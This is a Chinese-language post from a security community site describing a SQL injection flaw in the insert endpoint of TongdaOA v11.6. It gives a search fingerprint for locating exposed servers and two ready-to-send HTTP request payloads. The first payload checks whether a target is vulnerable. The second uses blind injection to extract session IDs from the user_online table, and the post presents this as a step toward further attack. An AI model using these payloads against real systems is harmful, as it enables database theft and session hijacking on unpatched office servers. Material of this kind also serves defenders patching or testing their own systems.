奇安信攻防社区-TongdaOA v11.6 insert SQL注入漏洞

TongdaOA v11.6 insert SQL注入漏洞

# TongdaOA v11.6 insert SQL注入漏洞 ## 漏洞描述 TongdaOA v11.6 insert参数包含SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息 ## 漏洞影响 TongdaOA v11.6 ## 网络测绘...

TongdaOA v11.6 insert SQL注入漏洞
=============================

漏洞描述
----

TongdaOA v11.6 insert参数包含SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息

漏洞影响
----

TongdaOA v11.6

网络测绘
----

app="TDXK-TongdaOA"

漏洞复现
----

登陆页面

![img](https://shs3.b.qianxin.com/butian_public/f930199e4143bbe016c1b1f28e54722e7147cec69e1f6.jpg)

发送请求包判断漏洞

```php
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
```

返回302则是存在漏洞，返回500则不存在

![img](https://shs3.b.qianxin.com/butian_public/f214631dbddb9045a86c5683919d8817653ef8b805d2b.jpg)

确认存在漏洞后，再通过SQL注入获取 SessionID进一步攻击

```php
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
```

发表于 2024-07-12 18:44:25
阅读 ( 953 )
分类：OA产品

TongdaOA v11.6 insert SQL注入漏洞

0 条评论